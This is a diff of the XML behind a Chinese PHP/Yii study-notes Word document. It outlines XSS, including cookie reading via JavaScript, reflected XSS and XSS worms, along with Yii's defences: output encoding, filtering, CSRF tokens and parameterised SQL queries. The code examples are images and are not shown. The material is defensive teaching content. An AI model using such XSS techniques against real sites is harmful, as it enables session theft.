+              </w:rPr>
+              <w:t>javascript</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>获取</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）反射型</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>XSS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>攻击</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>允许浏览器执行参数中的</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>js</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>代码：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E2F2D9B" wp14:editId="28CBE556">
+                  <wp:extent cx="3951605" cy="206375"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+                  <wp:docPr id="42" name="图片 42"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId50"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="206375"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>参数中加入</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>js</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>代码：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>经过</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>url</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>编码和</w:t>
+            </w:r>
+            <w:r>
+              <w:t>html</w:t>
+            </w:r>
+            <w:r>
+              <w:t>编码表处理</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDB7873" wp14:editId="54CE3E39">
+                  <wp:extent cx="3951605" cy="193675"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="47" name="图片 47"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId51"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="193675"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> )  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>xss</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>蠕虫</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14DFD8F5" wp14:editId="72A27442">
+                  <wp:extent cx="3951605" cy="2402205"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="48" name="图片 48"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId52"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="2402205"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>YII</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>防范</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>XSS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>攻击</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>转码</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>js</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>代码</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311517AF" wp14:editId="07D05F86">
+                  <wp:extent cx="3133333" cy="200000"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="49" name="图片 49"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId53"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3133333" cy="200000"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）过滤</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>js</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>代码</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pBdr>
+                <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+              </w:pBdr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="599AD123" wp14:editId="4A18DEC3">
+                  <wp:extent cx="3952240" cy="196850"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="50" name="图片 50"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId54"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="196850"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>CSRF</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>攻击</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>防范</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>跨站请求伪造</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF615AD" wp14:editId="67A0ED15">
+                  <wp:extent cx="1590476" cy="1028571"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
+                  <wp:docPr id="51" name="图片 51"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId55"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1590476" cy="1028571"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>YII</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>防范</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>CSRF</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>攻击</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> token</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>方式验证</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA42B71" wp14:editId="5CFAAFB7">
+                  <wp:extent cx="3952240" cy="599440"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="54" name="图片 54"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId56"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="599440"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CC6B359" wp14:editId="337E2097">
+                  <wp:extent cx="3952240" cy="1012825"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="53" name="图片 53"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId57"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="1012825"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>YII</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>会在</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>中保存一份加密后的</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>csrfToken</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，在服务器端与表单隐藏的</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>csrfToken</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>进行验证，一致才验证通过</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>注入</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ql</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>注入示例：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="367CE889" wp14:editId="099C9DE6">
+                  <wp:extent cx="3952240" cy="949325"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+                  <wp:docPr id="55" name="图片 55"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId58"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="949325"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>YII</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>防范</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>注入：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>db.php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6605093A" wp14:editId="54088F22">
+                  <wp:extent cx="3952240" cy="1306830"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
+                  <wp:docPr id="56" name="图片 56"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId59"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="1306830"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>参数占位符：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="450C8DFF" wp14:editId="3D67715B">
+                  <wp:extent cx="3800000" cy="885714"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="57" name="图片 57"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId60"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3800000" cy="885714"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
             <w:bookmarkStart w:id="2" w:name="_GoBack"/>
             <w:bookmarkEnd w:id="2"/>
           </w:p>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -16025,11 +16025,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
